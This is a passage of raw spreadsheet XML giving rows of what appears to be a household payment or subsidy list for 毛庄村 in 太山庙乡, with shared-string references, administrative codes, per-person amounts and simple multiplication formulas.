        <v>1</v>
      </c>
      <c r="H2276" s="14">
        <v>340</v>
      </c>
      <c r="I2276" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2276" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2276" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2277" ht="23" customHeight="1" spans="1:11">
      <c r="A2277" s="13" t="s">
        <v>5982</v>
      </c>
      <c r="B2277" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2277" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2277" s="14" t="s">
        <v>5983</v>
      </c>
      <c r="E2277" s="14" t="s">
        <v>5605</v>
      </c>
      <c r="F2277" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2277" s="14">
        <v>1</v>
      </c>
      <c r="H2277" s="14">
        <v>340</v>
      </c>
      <c r="I2277" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2277" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2277" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2278" ht="23" customHeight="1" spans="1:11">
      <c r="A2278" s="13" t="s">
        <v>5984</v>
      </c>
      <c r="B2278" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2278" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2278" s="14" t="s">
        <v>5985</v>
      </c>
      <c r="E2278" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2278" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2278" s="14">
        <v>1</v>
      </c>
      <c r="H2278" s="14">
        <v>340</v>
      </c>
      <c r="I2278" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2278" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2278" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2279" ht="23" customHeight="1" spans="1:11">
      <c r="A2279" s="13" t="s">
        <v>5986</v>
      </c>
      <c r="B2279" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2279" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2279" s="14" t="s">
        <v>5987</v>
      </c>
      <c r="E2279" s="14" t="s">
        <v>5594</v>
      </c>
      <c r="F2279" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2279" s="14">
        <v>1</v>
      </c>
      <c r="H2279" s="14">
        <v>340</v>
      </c>
      <c r="I2279" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2279" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2279" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2280" ht="23" customHeight="1" spans="1:11">
      <c r="A2280" s="13" t="s">
        <v>5988</v>
      </c>
      <c r="B2280" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2280" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2280" s="14" t="s">
        <v>5989</v>
      </c>
      <c r="E2280" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2280" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2280" s="14">
        <v>1</v>
      </c>
      <c r="H2280" s="14">
        <v>340</v>
      </c>
      <c r="I2280" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2280" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2280" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2281" ht="23" customHeight="1" spans="1:11">
      <c r="A2281" s="13" t="s">
        <v>5990</v>
      </c>
      <c r="B2281" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2281" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2281" s="14" t="s">
        <v>5991</v>
      </c>
      <c r="E2281" s="14" t="s">
        <v>5992</v>
      </c>
      <c r="F2281" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2281" s="14">
        <v>1</v>
      </c>
      <c r="H2281" s="14">
        <v>340</v>
      </c>
      <c r="I2281" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2281" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2281" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2282" ht="23" customHeight="1" spans="1:11">
      <c r="A2282" s="13" t="s">
        <v>5993</v>
      </c>
      <c r="B2282" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2282" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2282" s="14" t="s">
        <v>5994</v>
      </c>
      <c r="E2282" s="14" t="s">
        <v>5995</v>
      </c>
      <c r="F2282" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2282" s="14">
        <v>2</v>
      </c>
      <c r="H2282" s="14">
        <v>300</v>
      </c>
      <c r="I2282" s="14">
        <f t="shared" si="109"/>
        <v>600</v>
      </c>
      <c r="J2282" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2282" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2283" ht="23" customHeight="1" spans="1:11">
      <c r="A2283" s="13" t="s">
        <v>5996</v>
      </c>
      <c r="B2283" s="14" t="str">
        <f>B2282</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2283" s="14" t="str">
        <f>C2282</f>
        <v>毛庄村</v>
      </c>
      <c r="D2283" s="13" t="s">
        <v>5997</v>
      </c>
      <c r="E2283" s="13" t="s">
        <v>5837</v>
      </c>
      <c r="F2283" s="14">
        <f>F2282</f>
        <v>4113210704</v>
      </c>
      <c r="G2283" s="14"/>
      <c r="H2283" s="14"/>
      <c r="I2283" s="14"/>
      <c r="J2283" s="14"/>
      <c r="K2283" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2284" ht="23" customHeight="1" spans="1:11">
      <c r="A2284" s="13" t="s">
        <v>5998</v>
      </c>
      <c r="B2284" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2284" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2284" s="14" t="s">
        <v>5999</v>
      </c>
      <c r="E2284" s="14" t="s">
        <v>5741</v>
      </c>
      <c r="F2284" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2284" s="14">
        <v>2</v>
      </c>
      <c r="H2284" s="14">
        <v>300</v>
      </c>
      <c r="I2284" s="14">
        <f>H2284*G2284</f>
        <v>600</v>
      </c>
      <c r="J2284" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2284" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2285" ht="23" customHeight="1" spans="1:11">
      <c r="A2285" s="13" t="s">
        <v>6000</v>
      </c>
      <c r="B2285" s="14" t="str">
        <f>B2284</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2285" s="14" t="str">
        <f>C2284</f>
        <v>毛庄村</v>
      </c>
      <c r="D2285" s="13" t="s">
        <v>6001</v>
      </c>
      <c r="E2285" s="13" t="s">
        <v>5631</v>
      </c>
      <c r="F2285" s="14">
        <f>F2284</f>
        <v>4113210704</v>
      </c>
      <c r="G2285" s="14"/>
      <c r="H2285" s="14"/>
      <c r="I2285" s="14"/>
      <c r="J2285" s="14"/>
      <c r="K2285" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2286" ht="23" customHeight="1" spans="1:11">
      <c r="A2286" s="13" t="s">
        <v>6002</v>
      </c>
      <c r="B2286" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2286" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2286" s="14" t="s">
        <v>6003</v>
      </c>
      <c r="E2286" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2286" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2286" s="14">
        <v>1</v>
      </c>
      <c r="H2286" s="14">
        <v>340</v>
      </c>
      <c r="I2286" s="14">
        <f>H2286*G2286</f>
        <v>340</v>
      </c>
      <c r="J2286" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2286" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2287" ht="23" customHeight="1" spans="1:11">
      <c r="A2287" s="13" t="s">
        <v>6004</v>
      </c>
      <c r="B2287" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2287" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2287" s="14" t="s">
        <v>6005</v>
      </c>
      <c r="E2287" s="14" t="s">
        <v>6006</v>
      </c>
      <c r="F2287" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2287" s="14">
        <v>1</v>
      </c>
      <c r="H2287" s="14">
        <v>340</v>
      </c>
      <c r="I2287" s="14">
        <f>H2287*G2287</f>
        <v>340</v>
      </c>
      <c r="J2287" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2287" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2288" ht="23" customHeight="1" spans="1:11">
      <c r="A2288" s="13" t="s">
        <v>6007</v>
      </c>
      <c r="B2288" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2288" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2288" s="14" t="s">
        <v>6008</v>
      </c>
      <c r="E2288" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2288" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2288" s="14">
        <v>2</v>
      </c>
      <c r="H2288" s="14">
        <v>300</v>
      </c>
      <c r="I2288" s="14">
        <f>H2288*G2288</f>
        <v>600</v>
      </c>
      <c r="J2288" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2288" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2289" ht="23" customHeight="1" spans="1:11">
      <c r="A2289" s="13" t="s">
        <v>6009</v>
      </c>
      <c r="B2289" s="14" t="str">
        <f>B2288</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2289" s="14" t="str">
        <f>C2288</f>
        <v>毛庄村</v>
      </c>
      <c r="D2289" s="13" t="s">
        <v>6010</v>
      </c>
      <c r="E2289" s="13" t="s">
        <v>6011</v>
      </c>
      <c r="F2289" s="14">
        <f>F2288</f>
        <v>4113210704</v>
      </c>
      <c r="G2289" s="14"/>
      <c r="H2289" s="14"/>
      <c r="I2289" s="14"/>
      <c r="J2289" s="14"/>
      <c r="K2289" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2290" ht="23" customHeight="1" spans="1:11">
      <c r="A2290" s="13" t="s">
        <v>6012</v>
      </c>
      <c r="B2290" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2290" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2290" s="14" t="s">
        <v>6013</v>
      </c>
      <c r="E2290" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2290" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2290" s="14">
        <v>1</v>
      </c>
      <c r="H2290" s="14">
        <v>340</v>
      </c>
      <c r="I2290" s="14">
        <f>H2290*G2290</f>
        <v>340</v>
      </c>
      <c r="J2290" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2290" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2291" ht="23" customHeight="1" spans="1:11">
      <c r="A2291" s="13" t="s">
        <v>6014</v>
      </c>
      <c r="B2291" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2291" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2291" s="14" t="s">
        <v>6015</v>
      </c>
      <c r="E2291" s="14" t="s">
        <v>5682</v>
      </c>
      <c r="F2291" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2291" s="14">
        <v>1</v>
      </c>
      <c r="H2291" s="14">
        <v>340</v>
      </c>
      <c r="I2291" s="14">
        <f>H2291*G2291</f>
        <v>340</v>
      </c>
      <c r="J2291" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2291" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2292" ht="23" customHeight="1" spans="1:11">
      <c r="A2292" s="13" t="s">
        <v>6016</v>
      </c>
      <c r="B2292" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2292" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2292" s="14" t="s">
        <v>6017</v>
      </c>
      <c r="E2292" s="14" t="s">
        <v>5874</v>
      </c>
      <c r="F2292" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2292" s="14">
        <v>1</v>
      </c>
      <c r="H2292" s="14">
        <v>340</v>
      </c>
      <c r="I2292" s="14">
        <f>H2292*G2292</f>
        <v>340</v>
      </c>
      <c r="J2292" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2292" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2293" ht="23" customHeight="1" spans="1:11">
      <c r="A2293" s="13" t="s">
        <v>6018</v>
      </c>
      <c r="B2293" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2293" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2293" s="14" t="s">
        <v>6019</v>
      </c>
      <c r="E2293" s="14" t="s">
        <v>3633</v>
      </c>
      <c r="F2293" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2293" s="14">
        <v>1</v>
      </c>
      <c r="H2293" s="14">
        <v>340</v>
      </c>
      <c r="I2293" s="14">
        <f>H2293*G2293</f>
        <v>340</v>
      </c>
      <c r="J2293" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2293" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2294" ht="23" customHeight="1" spans="1:11">
      <c r="A2294" s="13" t="s">
        <v>6020</v>
      </c>
      <c r="B2294" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2294" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2294" s="14" t="s">
        <v>6021</v>
      </c>
      <c r="E2294" s="14" t="s">
        <v>4218</v>
      </c>
      <c r="F2294" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2294" s="14">
        <v>3</v>
      </c>
      <c r="H2294" s="14">
        <v>265</v>
      </c>
      <c r="I2294" s="14">
        <f>H2294*G2294</f>
        <v>795</v>
      </c>
      <c r="J2294" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2294" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2295" ht="23" customHeight="1" spans="1:11">
      <c r="A2295" s="13" t="s">
        <v>6022</v>
      </c>
      <c r="B2295" s="14" t="str">
        <f>B2294</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2295" s="14" t="str">
        <f>C2294</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2295" s="18" t="s">
        <v>6023</v>
      </c>
      <c r="E2295" s="18" t="s">
        <v>6024</v>
      </c>
      <c r="F2295" s="14" t="str">
        <f>F2294</f>
        <v>4113210705</v>
      </c>
      <c r="G2295" s="14"/>
      <c r="H2295" s="14"/>
      <c r="I2295" s="14"/>
      <c r="J2295" s="14"/>
      <c r="K2295" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2296" ht="23" customHeight="1" spans="1:11">
      <c r="A2296" s="13" t="s">
        <v>6025</v>
      </c>
      <c r="B2296" s="14" t="str">
        <f>B2295</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2296" s="14" t="str">
        <f>C2295</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2296" s="13" t="s">
        <v>6026</v>
      </c>
      <c r="E2296" s="13" t="s">
        <v>6027</v>
      </c>
      <c r="F2296" s="14" t="str">
        <f>F2295</f>
        <v>4113210705</v>
      </c>
      <c r="G2296" s="14"/>
      <c r="H2296" s="14"/>
      <c r="I2296" s="14"/>
      <c r="J2296" s="14"/>
      <c r="K2296" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2297" ht="23" customHeight="1" spans="1:11">
      <c r="A2297" s="13" t="s">
        <v>6028</v>
      </c>
      <c r="B2297" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2297" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2297" s="14" t="s">
        <v>1628</v>
      </c>
      <c r="E2297" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2297" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2297" s="14">
        <v>2</v>
      </c>
      <c r="H2297" s="14">
        <v>300</v>
      </c>
      <c r="I2297" s="14">
        <f>H2297*G2297</f>
        <v>600</v>
      </c>
      <c r="J2297" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2297" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2298" ht="23" customHeight="1" spans="1:11">
      <c r="A2298" s="13" t="s">
        <v>6029</v>
      </c>
      <c r="B2298" s="14" t="str">
        <f>B2297</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2298" s="14" t="str">
        <f>C2297</f>
        <v>毛庄村</v>
      </c>
      <c r="D2298" s="13" t="s">
        <v>6030</v>
      </c>
      <c r="E2298" s="13" t="s">
        <v>6031</v>
      </c>
      <c r="F2298" s="14">
        <f>F2297</f>
        <v>4113210704</v>
      </c>
      <c r="G2298" s="14"/>
      <c r="H2298" s="14"/>
      <c r="I2298" s="14"/>
      <c r="J2298" s="14"/>
      <c r="K2298" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2299" ht="23" customHeight="1" spans="1:11">
      <c r="A2299" s="13" t="s">
        <v>6032</v>
      </c>
      <c r="B2299" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2299" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2299" s="14" t="s">
        <v>6033</v>
      </c>
      <c r="E2299" s="14" t="s">
        <v>5772</v>
      </c>
      <c r="F2299" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2299" s="14">
        <v>2</v>
      </c>
      <c r="H2299" s="14">
        <v>300</v>
      </c>
      <c r="I2299" s="14">
        <f>H2299*G2299</f>
        <v>600</v>
      </c>
      <c r="J2299" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2299" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2300" ht="23" customHeight="1" spans="1:11">
      <c r="A2300" s="13" t="s">
        <v>6034</v>
      </c>
      <c r="B2300" s="14" t="str">
        <f>B2299</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2300" s="14" t="str">
        <f>C2299</f>
        <v>毛庄村</v>
      </c>
      <c r="D2300" s="14" t="s">
        <v>6035</v>
      </c>
      <c r="E2300" s="14" t="s">
        <v>6036</v>
      </c>
      <c r="F2300" s="14">
        <f>F2299</f>
        <v>4113210704</v>
      </c>
      <c r="G2300" s="14"/>
      <c r="H2300" s="14"/>
      <c r="I2300" s="14"/>
      <c r="J2300" s="14"/>
      <c r="K2300" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2301" ht="23" customHeight="1" spans="1:11">
      <c r="A2301" s="13" t="s">
        <v>6037</v>
      </c>
      <c r="B2301" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2301" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2301" s="14" t="s">
        <v>6038</v>
      </c>
      <c r="E2301" s="14" t="s">
        <v>5877</v>
      </c>
      <c r="F2301" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2301" s="14">
        <v>1</v>
      </c>
      <c r="H2301" s="14">
        <v>340</v>
      </c>
      <c r="I2301" s="14">
        <f>H2301*G2301</f>
        <v>340</v>
      </c>
      <c r="J2301" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2301" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2302" ht="23" customHeight="1" spans="1:11">
      <c r="A2302" s="13" t="s">
        <v>6039</v>
      </c>
      <c r="B2302" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2302" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2302" s="14" t="s">
        <v>6040</v>
      </c>
      <c r="E2302" s="14" t="s">
        <v>6041</v>
      </c>
      <c r="F2302" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2302" s="14">
        <v>1</v>
      </c>
      <c r="H2302" s="14">
        <v>340</v>
      </c>
      <c r="I2302" s="14">
        <f>H2302*G2302</f>
        <v>340</v>
      </c>
      <c r="J2302" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2302" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2303" ht="23" customHeight="1" spans="1:11">
      <c r="A2303" s="13" t="s">
        <v>6042</v>
      </c>
      <c r="B2303" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2303" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2303" s="14" t="s">
        <v>6043</v>
      </c>
      <c r="E2303" s="14" t="s">
        <v>5594</v>
      </c>
      <c r="F2303" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2303" s="14">
        <v>2</v>
      </c>
      <c r="H2303" s="14">
        <v>550</v>
      </c>
      <c r="I2303" s="14">
        <f>H2303*G2303</f>
        <v>1100</v>
      </c>
      <c r="J2303" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2303" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2304" ht="23" customHeight="1" spans="1:11">
      <c r="A2304" s="13" t="s">
        <v>6044</v>
      </c>
      <c r="B2304" s="14" t="str">
        <f>B2303</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2304" s="14" t="str">
        <f>C2303</f>
        <v>毛庄村</v>
      </c>
      <c r="D2304" s="13" t="s">
        <v>6045</v>
      </c>
      <c r="E2304" s="13" t="s">
        <v>6046</v>
      </c>
      <c r="F2304" s="14">
        <f>F2303</f>
        <v>4113210704</v>
      </c>
      <c r="G2304" s="14"/>
      <c r="H2304" s="14"/>
      <c r="I2304" s="14"/>
      <c r="J2304" s="14"/>
      <c r="K2304" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2305" ht="23" customHeight="1" spans="1:11">
      <c r="A2305" s="13" t="s">
        <v>6047</v>
      </c>
      <c r="B2305" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2305" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2305" s="14" t="s">
        <v>6048</v>
      </c>
      <c r="E2305" s="14" t="s">
        <v>5628</v>
      </c>
      <c r="F2305" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2305" s="14">
        <v>1</v>
      </c>
      <c r="H2305" s="14">
        <v>340</v>
      </c>
      <c r="I2305" s="14">
        <f>H2305*G2305</f>
        <v>340</v>
      </c>
      <c r="J2305" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2305" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2306" ht="23" customHeight="1" spans="1:11">
      <c r="A2306" s="13" t="s">
        <v>6049</v>
      </c>
      <c r="B2306" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2306" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2306" s="14" t="s">
        <v>6050</v>
      </c>
      <c r="E2306" s="14" t="s">
        <v>5668</v>
      </c>
      <c r="F2306" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2306" s="14">
        <v>1</v>
      </c>
      <c r="H2306" s="14">
        <v>340</v>
      </c>
      <c r="I2306" s="14">
        <f>H2306*G2306</f>
        <v>340</v>
      </c>
      <c r="J2306" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2306" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2307" ht="23" customHeight="1" spans="1:11">
      <c r="A2307" s="13" t="s">
        <v>6051</v>
      </c>
      <c r="B2307" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2307" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2307" s="14" t="s">
        <v>6052</v>
      </c>
      <c r="E2307" s="14" t="s">
        <v>5877</v>
      </c>
      <c r="F2307" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2307" s="14">
        <v>2</v>
      </c>
      <c r="H2307" s="14">
        <v>300</v>
      </c>
      <c r="I2307" s="14">
        <f>H2307*G2307</f>
        <v>600</v>
      </c>
      <c r="J2307" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2307" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2308" ht="23" customHeight="1" spans="1:11">
      <c r="A2308" s="13" t="s">
        <v>6053</v>
      </c>
      <c r="B2308" s="14" t="str">
        <f>B2307</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2308" s="14" t="str">
        <f>C2307</f>
        <v>毛庄村</v>
      </c>
      <c r="D2308" s="13" t="s">
        <v>6054</v>
      </c>
      <c r="E2308" s="13" t="s">
        <v>5617</v>
      </c>
      <c r="F2308" s="14">
        <f>F2307</f>
        <v>4113210704</v>
      </c>
      <c r="G2308" s="14"/>
      <c r="H2308" s="14"/>
      <c r="I2308" s="14"/>
      <c r="J2308" s="14"/>
      <c r="K2308" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2309" ht="23" customHeight="1" spans="1:11">
      <c r="A2309" s="13" t="s">
        <v>6055</v>
      </c>
      <c r="B2309" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2309" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2309" s="14" t="s">
        <v>2793</v>
      </c>
      <c r="E2309" s="14" t="s">
        <v>5594</v>
      </c>
      <c r="F2309" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2309" s="14">
        <v>1</v>
      </c>
      <c r="H2309" s="14">
        <v>340</v>
      </c>
      <c r="I2309" s="14">
        <f>H2309*G2309</f>
        <v>340</v>
      </c>
      <c r="J2309" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2309" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2310" ht="23" customHeight="1" spans="1:11">
      <c r="A2310" s="13" t="s">
        <v>6056</v>
      </c>
      <c r="B2310" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2310" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2310" s="14" t="s">
        <v>6057</v>
      </c>
      <c r="E2310" s="14" t="s">
        <v>6058</v>
      </c>
      <c r="F2310" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2310" s="14">
        <v>1</v>
      </c>
      <c r="H2310" s="14">
        <v>340</v>
      </c>
      <c r="I2310" s="14">
        <f>H2310*G2310</f>
        <v>340</v>
      </c>
      <c r="J2310" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2310" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2311" ht="23" customHeight="1" spans="1:11">
      <c r="A2311" s="13" t="s">
        <v>6059</v>
      </c>
      <c r="B2311" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2311" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2311" s="14" t="s">
        <v>671</v>
      </c>
      <c r="E2311" s="14" t="s">
        <v>5691</v>
      </c>
      <c r="F2311" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2311" s="14">
        <v>1</v>
      </c>
      <c r="H2311" s="14">
        <v>340</v>
      </c>
      <c r="I2311" s="14">
        <f>H2311*G2311</f>
        <v>340</v>
      </c>
      <c r="J2311" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2311" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2312" ht="23" customHeight="1" spans="1:11">
      <c r="A2312" s="13" t="s">
        <v>6060</v>
      </c>
      <c r="B2312" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2312" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2312" s="14" t="s">
        <v>6061</v>
      </c>
      <c r="E2312" s="14" t="s">
        <v>5688</v>
      </c>
      <c r="F2312" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2312" s="14">
        <v>2</v>
      </c>
      <c r="H2312" s="14">
        <v>300</v>
      </c>
      <c r="I2312" s="14">
        <f>H2312*G2312</f>
        <v>600</v>
      </c>
      <c r="J2312" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2312" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2313" ht="23" customHeight="1" spans="1:11">
      <c r="A2313" s="13" t="s">
        <v>6062</v>
      </c>
      <c r="B2313" s="14" t="str">
        <f>B2312</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2313" s="14" t="str">
        <f>C2312</f>
        <v>毛庄村</v>
      </c>
      <c r="D2313" s="13" t="s">
        <v>6063</v>
      </c>
      <c r="E2313" s="13" t="s">
        <v>5583</v>
      </c>
      <c r="F2313" s="14">
        <f>F2312</f>
        <v>4113210704</v>
      </c>
      <c r="G2313" s="14"/>
      <c r="H2313" s="14"/>
      <c r="I2313" s="14"/>
      <c r="J2313" s="14"/>
      <c r="K2313" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2314" ht="23" customHeight="1" spans="1:11">
      <c r="A2314" s="13" t="s">
        <v>6064</v>
      </c>
      <c r="B2314" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2314" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2314" s="14" t="s">
        <v>6065</v>
      </c>
      <c r="E2314" s="14" t="s">
        <v>3633</v>
      </c>
      <c r="F2314" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2314" s="14">
        <v>2</v>
      </c>
      <c r="H2314" s="14">
        <v>300</v>
      </c>
      <c r="I2314" s="14">
        <f>H2314*G2314</f>
        <v>600</v>
      </c>
      <c r="J2314" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2314" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2315" ht="23" customHeight="1" spans="1:11">
      <c r="A2315" s="13" t="s">
        <v>6066</v>
      </c>
      <c r="B2315" s="14" t="str">
        <f>B2314</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2315" s="14" t="str">
        <f>C2314</f>
        <v>毛庄村</v>
      </c>
      <c r="D2315" s="13" t="s">
        <v>6067</v>
      </c>
